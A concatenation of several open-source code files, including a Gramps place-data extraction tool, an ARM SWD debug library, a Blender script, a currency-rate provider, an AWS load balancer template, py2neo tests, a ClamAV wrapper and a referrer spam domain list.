u"AB." : (u"Alberta", 1),
u"ALBERTA" : (u"Alberta", 1),
u"BC" : (u"British Columbia", 1),
u"BC." : (u"British Columbia", 1),
u"B.C." : (u"British Columbia", 1),
u"MB" : (u"Manitoba", 1),
u"MB." : (u"Manitoba", 1),
u"MANITOBA" : (u"Manitoba", 1),
u"NB" : (u"New Brunswick", 1),
u"N.B." : (u"New Brunswick", 1),
u"NB." : (u"New Brunswick", 1),
u"NEW BRUNSWICK" : (u"New Brunswick", 1),
u"NL" : (u"Newfoundland and Labrador", 1),
u"NL." : (u"Newfoundland and Labrador", 1),
u"N.L." : (u"Newfoundland and Labrador", 1),
u"NEWFOUNDLAND" : (u"Newfoundland and Labrador", 1),
u"NEWFOUNDLAND AND LABRADOR" : (u"Newfoundland and Labrador", 1),
u"LABRADOR" : (u"Newfoundland and Labrador", 1),
u"NT" : (u"Northwest Territories", 1),
u"NT." : (u"Northwest Territories", 1),
u"N.T." : (u"Northwest Territories", 1),
u"NORTHWEST TERRITORIES" : (u"Northwest Territories", 1),
u"NS" : (u"Nova Scotia", 1),
u"NS." : (u"Nova Scotia", 1),
u"N.S." : (u"Nova Scotia", 1),
u"NOVA SCOTIA" : (u"Nova Scotia", 1),
u"NU" : (u"Nunavut", 1),
u"NU." : (u"Nunavut", 1),
u"NUNAVUT" : (u"Nunavut", 1),
u"ON" : (u"Ontario", 1),
u"ON." : (u"Ontario", 1),
u"ONTARIO" : (u"Ontario", 1),
u"PE" : (u"Prince Edward Island", 1),
u"PE." : (u"Prince Edward Island", 1),
u"PRINCE EDWARD ISLAND" : (u"Prince Edward Island", 1),
u"QC" : (u"Quebec", 1),
u"QC." : (u"Quebec", 1),
u"QUEBEC" : (u"Quebec", 1),
u"SK" : (u"Saskatchewan", 1),
u"SK." : (u"Saskatchewan", 1),
u"SASKATCHEWAN" : (u"Saskatchewan", 1),
u"YT" : (u"Yukon", 1),
u"YT." : (u"Yukon", 1),
u"YUKON" : (u"Yukon", 1),
u"ALSACE" : (u"Alsace", 2),
u"ALS" : (u"ALS-Alsace", 2),
u"AQUITAINE" : (u"Aquitaine", 2),
u"AQU" : (u"AQU-Aquitaine", 2),
u"AUVERGNE" : (u"Auvergne", 2),
u"AUV" : (u"AUV-Auvergne", 2),
u"BOURGOGNE" : (u"Bourgogne", 2),
u"BOU" : (u"BOU-Bourgogne", 2),
u"BRETAGNE" : (u"Bretagne", 2),
u"BRE" : (u"BRE-Bretagne", 2),
u"CENTRE" : (u"Centre - Val de Loire", 2),
u"CEN" : (u"CEN-Centre - Val de Loire", 2),
u"CHAMPAGNE" : (u"Champagne-Ardennes", 2),
u"CHA" : (u"CHA-Champagne-Ardennes", 2),
u"CORSE" : (u"Corse", 2),
u"COR" : (u"COR-Corse", 2),
u"FRANCHE-COMTE" : (u"Franche-Comté", 2),
u"FCO" : (u"FCO-Franche-Comté", 2),
u"ILE DE FRANCE" : (u"Ile de France", 2),
u"IDF" : (u"IDF-Ile de France", 2),
u"LIMOUSIN" : (u"Limousin", 2),
u"LIM" : (u"LIM-Limousin", 2),
u"LORRAINE" : (u"Lorraine", 2),
u"LOR" : (u"LOR-Lorraine", 2),
u"LANGUEDOC" : (u"Languedoc-Roussillon", 2),
u"LRO" : (u"LRO-Languedoc-Roussillon", 2),
u"MIDI PYRENEE" : (u"Midi-Pyrénée", 2),
u"MPY" : (u"MPY-Midi-Pyrénée", 2),
u"HAUTE NORMANDIE": (u"Haute Normandie", 2),
u"NOH" : (u"NOH-Haute Normandie", 2),
u"BASSE NORMANDIE": (u"Basse Normandie", 2),
u"NOB" : (u"NOB-Basse Normandie", 2),
u"NORD PAS CALAIS": (u"Nord-Pas de Calais", 2),
u"NPC" : (u"NPC-Nord-Pas de Calais", 2),
u"PROVENCE" : (u"Provence-Alpes-Côte d'Azur", 2),
u"PCA" : (u"PCA-Provence-Alpes-Côte d'Azur", 2),
u"POITOU-CHARENTES": (u"Poitou-Charentes", 2),
u"PCH" : (u"PCH-Poitou-Charentes", 2),
u"PAYS DE LOIRE" : (u"Pays de Loire", 2),
u"PDL" : (u"PDL-Pays de Loire", 2),
u"PICARDIE" : (u"Picardie", 2),
u"PIC" : (u"PIC-Picardie", 2),
u"RHONE-ALPES" : (u"Rhône-Alpes", 2),
u"RAL" : (u"RAL-Rhône-Alpes", 2),
u"AOM" : (u"AOM-Autres Territoires d'Outre-Mer", 2),
u"COM" : (u"COM-Collectivité Territoriale d'Outre-Mer", 2),
u"DOM" : (u"DOM-Départements d'Outre-Mer", 2),
u"TOM" : (u"TOM-Territoires d'Outre-Mer", 2),
u"GUA" : (u"GUA-Guadeloupe", 2),
u"GUADELOUPE" : (u"Guadeloupe", 2),
u"MAR" : (u"MAR-Martinique", 2),
u"MARTINIQUE" : (u"Martinique", 2),
u"GUY" : (u"GUY-Guyane", 2),
u"GUYANE" : (u"Guyane", 2),
u"REU" : (u"REU-Réunion", 2),
u"REUNION" : (u"Réunion", 2),
u"MIQ" : (u"MIQ-Saint-Pierre et Miquelon", 2),
u"MIQUELON" : (u"Saint-Pierre et Miquelon", 2),
u"MAY" : (u"MAY-Mayotte", 2),
u"MAYOTTE" : (u"Mayotte", 2),
u"(A)" : (u"Stockholms stad", 3),
u"(AB)" : (u"Stockholms stad/län", 3),
u"(B)" : (u"Stockholms län", 3),
u"(C)" : (u"Uppsala län", 3),
u"(D)" : (u"Södermanlands län", 3),
u"(E)" : (u"Östergötlands län", 3),
u"(F)" : (u"Jönköpings län", 3),
u"(G)" : (u"Kronobergs län", 3),
u"(H)" : (u"Kalmar län", 3),
u"(I)" : (u"Gotlands län", 3),
u"(K)" : (u"Blekinge län", 3),
u"(L)" : (u"Kristianstads län", 3),
u"(M)" : (u"Malmöhus län", 3),
u"(N)" : (u"Hallands län", 3),
u"(O)" : (u"Göteborgs- och Bohuslän", 3),
u"(P)" : (u"Älvsborgs län", 3),
u"(R)" : (u"Skaraborg län", 3),
u"(S)" : (u"Värmlands län", 3),
u"(T)" : (u"Örebro län", 3),
u"(U)" : (u"Västmanlands län", 3),
u"(W)" : (u"Kopparbergs län", 3),
u"(X)" : (u"Gävleborgs län", 3),
u"(Y)" : (u"Västernorrlands län", 3),
u"(AC)" : (u"Västerbottens län", 3),
u"(BD)" : (u"Norrbottens län", 3),
}
COLS = [
(_('Place title'), 1),
(_('City'), 2),
(_('State'), 3),
(_('ZIP/Postal Code'), 4),
(_('Country'), 5)
]
#-------------------------------------------------------------------------
#
# ExtractCity
#
#-------------------------------------------------------------------------
class ExtractCity(tool.BatchTool, ManagedWindow):
"""
Extracts city, state, and zip code information from an place description
if the title is empty and the description falls into the category of:
New York, NY 10000
Sorry for those not in the US or Canada. I doubt this will work for any
other locales.
Works for Sweden if the decriptions is like
Stockholm (A)
where the letter A is the abbreviation letter for laen.
Works for France if the description is like
Paris, IDF 75000, FRA
or Paris, ILE DE FRANCE 75000, FRA
"""
def __init__(self, dbstate, uistate, options_class, name, callback=None):
self.label = _('Extract Place data')
ManagedWindow.__init__(self, uistate, [], self.__class__)
self.set_window(Gtk.Window(), Gtk.Label(), '')
tool.BatchTool.__init__(self, dbstate, options_class, name)
if not self.fail:
uistate.set_busy_cursor(True)
self.run(dbstate.db)
uistate.set_busy_cursor(False)
def run(self, db):
"""
Performs the actual extraction of information
"""
self.progress = ProgressMeter(_('Checking Place Titles'), '')
self.progress.set_pass(_('Looking for place fields'),
self.db.get_number_of_places())
self.name_list = []
for place in db.iter_places():
descr = place.get_title()
loc = place.get_main_location()
self.progress.step()
if loc.get_street() == loc.get_city() == \
loc.get_state() == loc.get_postal_code() == "":
match = CITY_STATE_ZIP.match(descr.strip())
if match:
data = match.groups()
city = data[0]
state = data[2]
postal = data[5]
val = " ".join(state.strip().split()).upper()
if state:
new_state = STATE_MAP.get(val.upper())
if new_state:
self.name_list.append(
(place.handle, (city, new_state[0], postal,
COUNTRY[new_state[1]])))
continue
# Check if there is a left parant. in the string, might be Swedish laen.
match = CITY_LAEN.match(descr.strip().replace(","," "))
if match:
data = match.groups()
city = data[0]
state = '(' + data[1] + ')'
postal = None
val = " ".join(state.strip().split()).upper()
if state:
new_state = STATE_MAP.get(val.upper())
if new_state:
self.name_list.append(
(place.handle, (city, new_state[0], postal,
COUNTRY[new_state[1]])))
continue
match = CITY_STATE.match(descr.strip())
if match:
data = match.groups()
city = data[0]
state = data[1]
postal = None
if state:
m0 = STATE_ZIP.match(state)
if m0:
(state, postal) = m0.groups()
val = " ".join(state.strip().split()).upper()
if state:
new_state = STATE_MAP.get(val.upper())
if new_state:
self.name_list.append(
(place.handle, (city, new_state[0], postal,
COUNTRY[new_state[1]])))
continue
val = " ".join(descr.strip().split()).upper()
new_state = STATE_MAP.get(val)
if new_state:
self.name_list.append(
(place.handle, (None, new_state[0], None,
COUNTRY[new_state[1]])))
self.progress.close()
if self.name_list:
self.display()
else:
self.close()
from gramps.gui.dialog import OkDialog
OkDialog(_('No modifications made'),
_("No place information could be extracted."))
def display(self):
self.top = Glade("changenames.glade")
window = self.top.toplevel
self.top.connect_signals({
"destroy_passed_object" : self.close,
"on_ok_clicked" : self.on_ok_clicked,
"on_help_clicked" : self.on_help_clicked,
"on_delete_event" : self.close,
})
self.list = self.top.get_object("list")
self.set_window(window, self.top.get_object('title'), self.label)
lbl = self.top.get_object('info')
lbl.set_line_wrap(True)
lbl.set_text(
_('Below is a list of Places with the possible data that can '
'be extracted from the place title. Select the places you '
'wish Gramps to convert.'))
self.model = Gtk.ListStore(GObject.TYPE_BOOLEAN, GObject.TYPE_STRING,
GObject.TYPE_STRING, GObject.TYPE_STRING,
GObject.TYPE_STRING, GObject.TYPE_STRING,
GObject.TYPE_STRING)
r = Gtk.CellRendererToggle()
r.connect('toggled', self.toggled)
c = Gtk.TreeViewColumn(_('Select'), r, active=0)
self.list.append_column(c)
for (title, col) in COLS:
render = Gtk.CellRendererText()
if col > 1:
render.set_property('editable', True)
render.connect('edited', self.__change_name, col)
self.list.append_column(
Gtk.TreeViewColumn(title, render, text=col))
self.list.set_model(self.model)
self.iter_list = []
self.progress.set_pass(_('Building display'), len(self.name_list))
for (id, data) in self.name_list:
place = self.db.get_place_from_handle(id)
descr = place.get_title()
handle = self.model.append()
self.model.set_value(handle, 0, True)
self.model.set_value(handle, 1, descr)
if data[0]:
self.model.set_value(handle, 2, data[0])
if data[1]:
self.model.set_value(handle, 3, data[1])
if data[2]:
self.model.set_value(handle, 4, data[2])
if data[3]:
self.model.set_value(handle, 5, data[3])
self.model.set_value(handle, 6, id)
self.iter_list.append(handle)
self.progress.step()
self.progress.close()
self.show()
def __change_name(self, text, path, new_text, col):
self.model[path][col] = new_text
return
def toggled(self, cell, path_string):
path = tuple(map(int, path_string.split(':')))
row = self.model[path]
row[0] = not row[0]
def build_menu_names(self, obj):
return (self.label, None)
def on_help_clicked(self, obj):
"""Display the relevant portion of GRAMPS manual"""
display_help()
def on_ok_clicked(self, obj):
with DbTxn(_("Extract Place data"), self.db, batch=True) as self.trans:
self.db.disable_signals()
changelist = [node for node in self.iter_list
if self.model.get_value(node, 0)]
for change in changelist:
row = self.model[change]
place = self.db.get_place_from_handle(row[6])
(city, state, postal, country) = (row[2], row[3], row[4], row[5])
if city:
place.get_main_location().set_city(city)
if state:
place.get_main_location().set_state(state)
if postal:
place.get_main_location().set_postal_code(postal)
if country:
place.get_main_location().set_country(country)
self.db.commit_place(place, self.trans)
self.db.enable_signals()
self.db.request_rebuild()
self.close()
#------------------------------------------------------------------------
#
#
#
#------------------------------------------------------------------------
class ExtractCityOptions(tool.ToolOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, person_id=None):
tool.ToolOptions.__init__(self, name, person_id)
| gpl-2.0 | 1,880,201,087,278,255,900 | 40.255962 | 88 | 0.432139 | false |
hugovincent/pirate-swd | SWDCommon.py | 1 | 4282 | import time
class DebugPort:
def __init__ (self, swd):
self.swd = swd
# read the IDCODE
# Hugo: according to ARM DDI 0316D we should have 0x2B.. not 0x1B.., but
# 0x1B.. is what upstream used, so leave it in here...
if self.idcode() not in [0x1BA01477, 0x2BA01477]:
print "warning: unexpected idcode"
# power shit up
self.swd.writeSWD(False, 1, 0x54000000)
if (self.status() >> 24) != 0xF4:
print "error powering up system"
sys.exit(1)
# get the SELECT register to a known state
self.select(0,0)
self.curAP = 0
self.curBank = 0
def idcode (self):
return self.swd.readSWD(False, 0)
def abort (self, orunerr, wdataerr, stickyerr, stickycmp, dap):
value = 0x00000000
value = value | (0x10 if orunerr else 0x00)
value = value | (0x08 if wdataerr else 0x00)
value = value | (0x04 if stickyerr else 0x00)
value = value | (0x02 if stickycmp else 0x00)
value = value | (0x01 if dap else 0x00)
self.swd.writeSWD(False, 0, value)
def status (self):
return self.swd.readSWD(False, 1)
def control (self, trnCount = 0, trnMode = 0, maskLane = 0, orunDetect = 0):
value = 0x54000000
value = value | ((trnCount & 0xFFF) << 12)
value = value | ((maskLane & 0x00F) << 8)
value = value | ((trnMode & 0x003) << 2)
value = value | (0x1 if orunDetect else 0x0)
self.swd.writeSWD(False, 1, value)
def select (self, apsel, apbank):
value = 0x00000000
value = value | ((apsel & 0xFF) << 24)
value = value | ((apbank & 0x0F) << 4)
self.swd.writeSWD(False, 2, value)
def readRB (self):
return self.swd.readSWD(False, 3)
def readAP (self, apsel, address):
adrBank = (address >> 4) & 0xF
adrReg = (address >> 2) & 0x3
if apsel != self.curAP or adrBank != self.curBank:
self.select(apsel, adrBank)
self.curAP = apsel
self.curBank = adrBank
return self.swd.readSWD(True, adrReg)
def writeAP (self, apsel, address, data, ignore = False):
adrBank = (address >> 4) & 0xF
adrReg = (address >> 2) & 0x3
if apsel != self.curAP or adrBank != self.curBank:
self.select(apsel, adrBank)
self.curAP = apsel
self.curBank = adrBank
self.swd.writeSWD(True, adrReg, data, ignore)
class MEM_AP:
def __init__ (self, dp, apsel):
self.dp = dp
self.apsel = apsel
self.csw(1,2) # 32-bit auto-incrementing addressing
def csw (self, addrInc, size):
self.dp.readAP(self.apsel, 0x00)
csw = self.dp.readRB() & 0xFFFFFF00
self.dp.writeAP(self.apsel, 0x00, csw + (addrInc << 4) + size)
def idcode (self):
self.dp.readAP(self.apsel, 0xFC)
return self.dp.readRB()
def readWord (self, adr):
self.dp.writeAP(self.apsel, 0x04, adr)
self.dp.readAP(self.apsel, 0x0C)
return self.dp.readRB()
def writeWord (self, adr, data):
self.dp.writeAP(self.apsel, 0x04, adr)
self.dp.writeAP(self.apsel, 0x0C, data)
return self.dp.readRB()
def readBlock (self, adr, count):
self.dp.writeAP(self.apsel, 0x04, adr)
vals = [self.dp.readAP(self.apsel, 0x0C) for off in range(count)]
vals.append(self.dp.readRB())
return vals[1:]
def writeBlock (self, adr, data):
self.dp.writeAP(self.apsel, 0x04, adr)
for val in data:
self.dp.writeAP(self.apsel, 0x0C, val)
def writeBlockNonInc (self, adr, data):
self.csw(0, 2) # 32-bit non-incrementing addressing
self.dp.writeAP(self.apsel, 0x04, adr)
for val in data:
self.dp.writeAP(self.apsel, 0x0C, val)
self.csw(1, 2) # 32-bit auto-incrementing addressing
def writeHalfs (self, adr, data):
self.csw(2, 1) # 16-bit packed-incrementing addressing
self.dp.writeAP(self.apsel, 0x04, adr)
for val in data:
time.sleep(0.001)
self.dp.writeAP(self.apsel, 0x0C, val, ignore = True)
self.csw(1, 2) # 32-bit auto-incrementing addressing
| bsd-3-clause | 1,786,803,907,590,919,400 | 34.683333 | 81 | 0.578001 | false |
oscurart/BlenderAddons | oscurart_delta_to_global.py | 1 | 1400 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# AUTHOR: Eugenio Pignataro (Oscurart) www.oscurart.com.ar
# USAGE: Select object and run. This script invert apply transformations to deltas.
import bpy
for ob in bpy.context.selected_objects:
mat = ob.matrix_world
ob.location = mat.to_translation()
ob.delta_location = (0,0,0)
if ob.rotation_mode == "QUATERNION":
ob.rotation_quaternion = mat.to_quaternion()
ob.delta_rotation_quaternion = (1,0,0,0)
else:
ob.rotation_euler = mat.to_euler()
ob.delta_rotation_euler = (0,0,0)
ob.scale = mat.to_scale()
ob.delta_scale = (1,1,1)
| gpl-2.0 | 6,044,060,806,490,240,000 | 35.842105 | 83 | 0.692143 | false |
dorotapalicova/GoldDigger | gold_digger/data_providers/grandtrunk.py | 1 | 2755 | # -*- coding: utf-8 -*-
from datetime import datetime, date
from collections import defaultdict
from ._provider import Provider
class GrandTrunk(Provider):
"""
Service offers day exchange rates based on Federal Reserve and European Central Bank.
It is currently free for use in low-volume and non-commercial settings.
"""
BASE_URL = "http://currencies.apps.grandtrunk.net"
BASE_CURRENCY = "USD"
name = "grandtrunk"
def get_by_date(self, date_of_exchange, currency):
date_str = date_of_exchange.strftime(format="%Y-%m-%d")
self.logger.debug("Requesting GrandTrunk for %s (%s)", currency, date_str, extra={"currency": currency, "date": date_str})
response = self._get("{url}/getrate/{date}/{from_currency}/{to}".format(
url=self.BASE_URL, date=date_str, from_currency=self.BASE_CURRENCY, to=currency))
if response:
return self._to_decimal(response.text.strip(), currency)
def get_all_by_date(self, date_of_exchange, currencies):
day_rates = {}
for currency in currencies:
response = self._get("{url}/getrate/{date}/{from_currency}/{to}".format(
url=self.BASE_URL, date=date_of_exchange, from_currency=self.BASE_CURRENCY, to=currency))
if response:
decimal_value = self._to_decimal(response.text.strip(), currency)
if decimal_value:
day_rates[currency] = decimal_value
return day_rates
def get_historical(self, origin_date, currencies):
day_rates = defaultdict(dict)
origin_date_string = origin_date.strftime(format="%Y-%m-%d")
for currency in currencies:
response = self._get("{url}/getrange/{from_date}/{to_date}/{from_currency}/{to}".format(
url=self.BASE_URL, from_date=origin_date_string, to_date=date.today(), from_currency=self.BASE_CURRENCY, to=currency
))
records = response.text.strip().split("\n") if response else []
for record in records:
record = record.rstrip()
if record:
try:
date_string, exchange_rate_string = record.split(" ")
day = datetime.strptime(date_string, "%Y-%m-%d")
except ValueError as e:
self.logger.error("%s - Parsing of rate&date on record '%s' failed: %s" % (self, record, e))
continue
decimal_value = self._to_decimal(exchange_rate_string, currency)
if decimal_value:
day_rates[day][currency] = decimal_value
return day_rates
def __str__(self):
return self.name
| apache-2.0 | 8,640,422,715,685,752,000 | 45.694915 | 132 | 0.587659 | false |
caktus/aws-web-stacks | stack/load_balancer.py | 1 | 4262 | from troposphere import GetAtt, If, Join, Output, Ref
from troposphere import elasticloadbalancing as elb
from . import USE_ECS, USE_GOVCLOUD
from .security_groups import load_balancer_security_group
from .template import template
from .utils import ParameterWithDefaults as Parameter
from .vpc import public_subnet_a, public_subnet_b
# Web worker
if USE_ECS:
web_worker_port = Ref(template.add_parameter(
Parameter(
"WebWorkerPort",
Description="Web worker container exposed port",
Type="Number",
Default="8000",
),
group="Load Balancer",
label="Web Worker Port",
))
else:
# default to port 80 for EC2 and Elastic Beanstalk options
web_worker_port = Ref(template.add_parameter(
Parameter(
"WebWorkerPort",
Description="Default web worker exposed port (non-HTTPS)",
Type="Number",
Default="80",
),
group="Load Balancer",
label="Web Worker Port",
))
web_worker_protocol = Ref(template.add_parameter(
Parameter(
"WebWorkerProtocol",
Description="Web worker instance protocol",
Type="String",
Default="HTTP",
AllowedValues=["HTTP", "HTTPS"],
),
group="Load Balancer",
label="Web Worker Protocol",
))
# Web worker health check
web_worker_health_check_protocol = Ref(template.add_parameter(
Parameter(
"WebWorkerHealthCheckProtocol",
Description="Web worker health check protocol",
Type="String",
Default="TCP",
AllowedValues=["TCP", "HTTP", "HTTPS"],
),
group="Load Balancer",
label="Health Check: Protocol",
))
web_worker_health_check_port = Ref(template.add_parameter(
Parameter(
"WebWorkerHealthCheckPort",
Description="Web worker health check port",
Type="Number",
Default="80",
),
group="Load Balancer",
label="Health Check: Port",
))
web_worker_health_check = Ref(template.add_parameter(
Parameter(
"WebWorkerHealthCheck",
Description="Web worker health check URL path, e.g., \"/health-check\"; "
"required unless WebWorkerHealthCheckProtocol is TCP",
Type="String",
Default="",
),
group="Load Balancer",
label="Health Check: URL",
))
# Web load balancer
listeners = [
elb.Listener(
LoadBalancerPort=80,
InstanceProtocol=web_worker_protocol,
InstancePort=web_worker_port,
Protocol='HTTP',
)
]
if USE_GOVCLOUD:
# configure the default HTTPS listener to pass TCP traffic directly,
# since GovCloud doesn't support the Certificate Manager (this can be
# modified to enable SSL termination at the load balancer via the AWS
# console, if needed)
listeners.append(elb.Listener(
LoadBalancerPort=443,
InstanceProtocol='TCP',
InstancePort=443,
Protocol='TCP',
))
else:
from .certificates import application as application_certificate
from .certificates import cert_condition
listeners.append(If(cert_condition, elb.Listener(
LoadBalancerPort=443,
InstanceProtocol=web_worker_protocol,
InstancePort=web_worker_port,
Protocol='HTTPS',
SSLCertificateId=application_certificate,
), Ref("AWS::NoValue")))
load_balancer = elb.LoadBalancer(
'LoadBalancer',
template=template,
Subnets=[
Ref(public_subnet_a),
Ref(public_subnet_b),
],
SecurityGroups=[Ref(load_balancer_security_group)],
Listeners=listeners,
HealthCheck=elb.HealthCheck(
Target=Join("", [
web_worker_health_check_protocol,
":",
web_worker_health_check_port,
web_worker_health_check,
]),
HealthyThreshold="2",
UnhealthyThreshold="2",
Interval="100",
Timeout="10",
),
CrossZone=True,
)
template.add_output(Output(
"LoadBalancerDNSName",
Description="Loadbalancer DNS",
Value=GetAtt(load_balancer, "DNSName")
))
template.add_output(Output(
"LoadBalancerHostedZoneID",
Description="Loadbalancer hosted zone",
Value=GetAtt(load_balancer, "CanonicalHostedZoneNameID")
))
| mit | 8,519,122,697,732,304,000 | 27.039474 | 81 | 0.635852 | false |
technige/py2neo | test/integration/test_types.py | 1 | 4086 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2011-2021, Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neotime import Date, Time, DateTime, Duration
from packaging.version import Version
from pytest import skip
from py2neo.data import Node
from py2neo.data.spatial import CartesianPoint, WGS84Point
def test_null(graph):
i = None
o = graph.evaluate("RETURN $x", x=i)
assert o is i
def test_true(graph):
i = True
o = graph.evaluate("RETURN $x", x=i)
assert o is i
def test_false(graph):
i = False
o = graph.evaluate("RETURN $x", x=i)
assert o is i
def test_int(graph):
for i in range(-128, 128):
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_float(graph):
for i in range(-128, 128):
f = float(i) + 0.5
o = graph.evaluate("RETURN $x", x=f)
assert o == f
def test_string(graph):
i = u"hello, world"
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_bytes(graph):
i = bytearray([65, 66, 67])
o = graph.evaluate("RETURN $x", x=i)
# The values are coerced to bytearray before comparison
# as HTTP does not support byte parameters, instead
# coercing such values to lists of integers.
assert bytearray(o) == bytearray(i)
def test_list(graph):
i = [65, 66, 67]
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_dict(graph):
i = {"one": 1, "two": 2}
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_node(graph):
i = Node("Person", name="Alice")
o = graph.evaluate("CREATE (a:Person {name: 'Alice'}) RETURN a")
assert o.labels == i.labels
assert dict(o) == dict(i)
def test_relationship(graph):
o = graph.evaluate("CREATE ()-[r:KNOWS {since: 1999}]->() RETURN r")
assert type(o).__name__ == "KNOWS"
assert dict(o) == {"since": 1999}
def test_path(graph):
o = graph.evaluate("CREATE p=(:Person {name: 'Alice'})-[:KNOWS]->(:Person {name: 'Bob'}) RETURN p")
assert len(o) == 1
assert o.start_node.labels == {"Person"}
assert dict(o.start_node) == {"name": "Alice"}
assert type(o.relationships[0]).__name__ == "KNOWS"
assert o.end_node.labels == {"Person"}
assert dict(o.end_node) == {"name": "Bob"}
def skip_if_no_temporal_support(graph):
connector = graph.service.connector
if graph.service.kernel_version < Version("3.4"):
skip("Temporal type tests are only valid for Neo4j 3.4+")
if connector.profile.protocol != "bolt":
skip("Temporal type tests are only valid for Bolt connectors")
def test_date(graph):
skip_if_no_temporal_support(graph)
i = Date(2014, 8, 6)
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_time(graph):
skip_if_no_temporal_support(graph)
i = Time(12, 34, 56.789)
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_date_time(graph):
skip_if_no_temporal_support(graph)
i = DateTime(2014, 8, 6, 12, 34, 56.789)
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_duration(graph):
skip_if_no_temporal_support(graph)
i = Duration(months=1, days=2, seconds=3)
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_cartesian_point(graph):
skip_if_no_temporal_support(graph)
i = CartesianPoint((12.34, 56.78))
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_wgs84_point(graph):
skip_if_no_temporal_support(graph)
i = WGS84Point((12.34, 56.78))
o = graph.evaluate("RETURN $x", x=i)
assert o == i
| apache-2.0 | 5,860,425,260,002,688,000 | 25.36129 | 103 | 0.631424 | false |
hirokihamasaki/irma | probe/modules/antivirus/clamav/clam.py | 1 | 3588 | #
# Copyright (c) 2013-2016 Quarkslab.
# This file is part of IRMA project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the top-level directory
# of this distribution and at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# No part of the project, including this file, may be copied,
# modified, propagated, or distributed except according to the
# terms contained in the LICENSE file.
import logging
import re
from ..base import Antivirus
log = logging.getLogger(__name__)
class Clam(Antivirus):
_name = "Clam AntiVirus Scanner (Linux)"
# ==================================
# Constructor and destructor stuff
# ==================================
def __init__(self, *args, **kwargs):
# class super class constructor
super(Clam, self).__init__(*args, **kwargs)
# scan tool variables
self._scan_args = (
"--infected " # only print infected files
"--fdpass " # avoid file access problem as clamdameon
# is runned by clamav user
"--no-summary " # disable summary at the end of scanning
"--stdout " # do not write to stderr
)
self._scan_patterns = [
re.compile(r'(?P<file>.*): (?P<name>[^\s]+) FOUND', re.IGNORECASE)
]
# ==========================================
# Antivirus methods (need to be overriden)
# ==========================================
def get_version(self):
"""return the version of the antivirus"""
result = None
if self.scan_path:
cmd = self.build_cmd(self.scan_path, '--version')
retcode, stdout, stderr = self.run_cmd(cmd)
if not retcode:
matches = re.search(r'(?P<version>\d+(\.\d+)+)',
stdout,
re.IGNORECASE)
if matches:
result = matches.group('version').strip()
return result
def get_database(self):
"""return list of files in the database"""
# NOTE: we can use clamconf to get database location, but it is not
# always installed by default. Instead, hardcode some common paths and
# locate files using predefined patterns
search_paths = [
'/var/lib/clamav', # default location in debian
]
database_patterns = [
'main.cvd',
'daily.c[lv]d', # *.cld on debian and on
# *.cvd on clamav website
'bytecode.c[lv]d', # *.cld on debian and on
# *.cvd on clamav website
'safebrowsing.c[lv]d', # *.cld on debian and on
# *.cvd on clamav website
'*.hdb', # clamav hash database
'*.mdb', # clamav MD5, PE-section based
'*.ndb', # clamav extended signature format
'*.ldb', # clamav logical signatures
]
results = []
for pattern in database_patterns:
result = self.locate(pattern, search_paths, syspath=False)
results.extend(result)
return results if results else None
def get_scan_path(self):
"""return the full path of the scan tool"""
paths = self.locate("clamdscan")
return paths[0] if paths else None
| apache-2.0 | 4,104,439,727,466,220,000 | 37.170213 | 78 | 0.516165 | false |
archshift/analytics-report | ReferrerBlacklist.py | 1 | 4361 | # From https://github.com/piwik/referrer-spam-blacklist/blob/master/spammers.txt - update regularly
referrer_blacklist = """0n-line.tv
100dollars-seo.com
12masterov.com
1pamm.ru
4webmasters.org
5forex.ru
7makemoneyonline.com
acads.net
adcash.com
adspart.com
adventureparkcostarica.com
adviceforum.info
affordablewebsitesandmobileapps.com
afora.ru
akuhni.by
allknow.info
allnews.md
allwomen.info
alpharma.net
altermix.ua
amt-k.ru
anal-acrobats.hol.es
anapa-inns.ru
android-style.com
anticrawler.org
arendakvartir.kz
arkkivoltti.net
artparquet.ru
aruplighting.com
autovideobroadcast.com
aviva-limoux.com
azartclub.org
baixar-musicas-gratis.com
baladur.ru
balitouroffice.com
bard-real.com.ua
bestmobilityscooterstoday.com
best-seo-offer.com
best-seo-solution.com
bestwebsitesawards.com
bif-ru.info
biglistofwebsites.com
billiard-classic.com.ua
bizru.info
blackhatworth.com
bluerobot.info
blue-square.biz
bmw.afora.ru
brakehawk.com
break-the-chains.com
brk-rti.ru
brothers-smaller.ru
budmavtomatika.com.ua
buttons-for-website.com
buttons-for-your-website.com
buy-cheap-online.info
buy-forum.ru
cardiosport.com.ua
cartechnic.ru
cenokos.ru
cenoval.ru
cezartabac.ro
cityadspix.com
ci.ua
civilwartheater.com
coderstate.com
codysbbq.com
conciergegroup.org
connectikastudio.com
cubook.supernew.org
customsua.com.ua
dailyrank.net
darodar.com
delfin-aqua.com.ua
demenageur.com
descargar-musica-gratis.net
detskie-konstruktory.ru
dipstar.org
djekxa.ru
dojki-hd.com
domination.ml
doska-vsem.ru
dostavka-v-krym.com
